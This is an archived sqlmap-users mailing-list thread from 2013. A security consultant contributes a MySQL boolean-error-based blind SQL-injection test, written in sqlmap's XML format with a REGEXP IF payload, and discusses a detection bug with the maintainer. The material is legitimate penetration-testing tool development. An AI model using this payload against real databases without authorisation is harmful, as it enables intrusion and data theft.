Hi Miroslav, Am 10.06.2013 12:22, schrieb Miroslav Stampar: > Hi Sebastian. > > There was indeed a bug [1]. Find it fixed now.
And its working, thanks! > If you would like to contribute this payload we could include it into > sqlmap :) With pleasure! It should be working with (at least) MySQL, I haven't verified it in PostgreSQL. It *is* working in WHERE, SELECT before FROM and ORDER BY, not tested for other locations. Quite possibly similar 'syntax errors' can be found for other locations/dbms. The "" are needed, because sqlmap will convert '' into 0x, which will not throw an error. Kind regards, Sebastian Nerz > > Kind regards, > Miroslav Stampar > > [1] https://github.com/sqlmapproject/sqlmap/issues/462 > > > On Mon, Jun 10, 2013 at 11:30 AM, Sebastian Nerz > <sebastian.n...@syss.de>wrote: > >> Hi there, >> >> I wrote a small payload, to test for conditional error-based >> SQL-injection possibilities: >> >> <!-- Boolean-error-based blind tests - WHERE/HAVING clause --> >> <test> >> <title>AND boolean-error-based blind - WHERE or HAVING clause >> (MySQL)</title> >> <stype>1</stype> >> <level>1</level> >> <risk>1</risk> >> <clause>1</clause> >> <where>1</where> >> <vector>REGEXP IF([INFERENCE],1,"")</vector> >> <request> >> <payload>REGEXP IF([RANDNUM]=[RANDNUM],1,"")</payload> >> </request> >> <response> >> <comparison>REGEXP IF([RANDNUM]=[RANDNUM1],1,"")</comparison> >> </response> >> <details> >> <dbms>MySQL</dbms> >> </details> >> </test> >> >> >> Theoretically it is working - as long as the server is actually >> returning content, the injection is detected and works just fine (feel >> free to add it to the sqlmap repository, if it is correct :) ). But a >> soon as the tested URL is returning an empty page, detection fails. >> >> * With a TRUE request, the server returns a content-length of 0 >> * With a FALSE request, the server returns the error message >> >> Now ... for my understanding, this is quite a difference, but SQLMAP >> fails to recognize it, even with "not-string" given. The problem might >> be, that the server returns a warning during the dynamic-check as well. >> Is it possible to forbid the usage of ' during this test? >> >> What am I doing wrong? Is there an error in the payload above? Can >> sqlmap handle empty pages? >> >> Thanks! >> >> Kind regards, >> >> Sebastian Nerz >> -- >> Sebastian Nerz >> Dipl.-Inform. >> IT-Security Consultant >> >> mailto:sebastian.n...@syss.de >> ___________________________________________________________ >> >> SySS GmbH >> Wohlboldstraße 8 >> 72072 Tübingen >> Germany >> Voice: +49 7071 407856-31 >> Fax: +49 7071 407856-19 >> WWW: http://www.syss.de >> >> PGP FP: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2 >> >> Geschaeftsfuehrer Sebastian Schreiber >> Registergericht: Amtsgericht Stuttgart / HRB 382420 >> Steuernummer: 86118 / 55809 >> >> >> >> >> ------------------------------------------------------------------------------ >> How ServiceNow helps IT people transform IT departments: >> 1. A cloud service to automate IT design, transition and operations >> 2. Dashboards that offer high-level views of enterprise services >> 3. A single system of record for all IT processes >> http://p.sf.net/sfu/servicenow-d2d-j >> _______________________________________________ >> sqlmap-users mailing list >> sqlmap-users@lists.sourceforge.net >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > -- Sebastian Nerz Dipl.-Inform. IT-Security Consultant mailto:sebastian.n...@syss.de ___________________________________________________________ SySS GmbH Wohlboldstraße 8 72072 Tübingen Germany Voice: +49 7071 407856-31 Fax: +49 7071 407856-19 WWW: http://www.syss.de PGP FP: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2 Geschaeftsfuehrer Sebastian Schreiber Registergericht: Amtsgericht Stuttgart / HRB 382420 Steuernummer: 86118 / 55809
signature.asc
Description: OpenPGP digital signature
------------------------------------------------------------------------------ How ServiceNow helps IT people transform IT departments: 1. A cloud service to automate IT design, transition and operations 2. Dashboards that offer high-level views of enterprise services 3. A single system of record for all IT processes http://p.sf.net/sfu/servicenow-d2d-j
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
